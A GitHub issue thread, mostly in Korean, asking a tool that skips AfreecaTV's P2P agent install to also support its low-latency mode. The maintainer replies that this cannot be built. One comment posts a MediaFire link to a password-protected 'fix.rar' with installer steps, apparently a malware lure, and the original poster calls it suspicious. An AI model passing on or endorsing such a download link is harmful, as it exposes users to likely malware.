### ISSUE TITLE
아프리카tv 시차단축 기능을 켤 때는 p2p 에이전트 설치 요구를 받음

### ISSUE THREAD

**Issue by TaeDDin** [hui1601/AfreecaBypassInstallAgent#2]
아프리카tv 시차단축 기능을 켤 때는 p2p 에이전트 설치 요구를 받음.
기본으로 켜져있게 하거나 화질설정처럼 에이전트 설치 요구를 없애줬으면 함.

**Comment by marcosj046** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by TaeDDin** [comment]
> https://www.mediafire.com/file/czdodbba054p738/fix.rar/file 을 다운로드합니다 . 포스틱:changeme 설치 메뉴에서 "gcc"를 선택합니다.

The link is weird and I wish you would give me another normal link.

**Comment by hui1601** [comment]
테스트 켤과 원본 화질 시청이 일반적으로 저지연 모드를 켠 것보다 시차가 더 적기에 굳이 사용할 필요가 없습니다.
또한 저지연 모드는 P2P 에이전트에서 작동되기에 구현이 불가능합니다.

**Comment by TaeDDin** [comment]
원본 화질 시청이라는 게 그냥 적용한 상태로 최대 화질 설정 후 볼 때를 얘기 하시는 건가요? 
제가 테스트 했을 때는 p2p 에이전트 깔고 시차단축 기능을 킨게 5~6초는 빠른 것 같아서요.
일단 구현이 불가능 하니까 참고 보겠습니다.
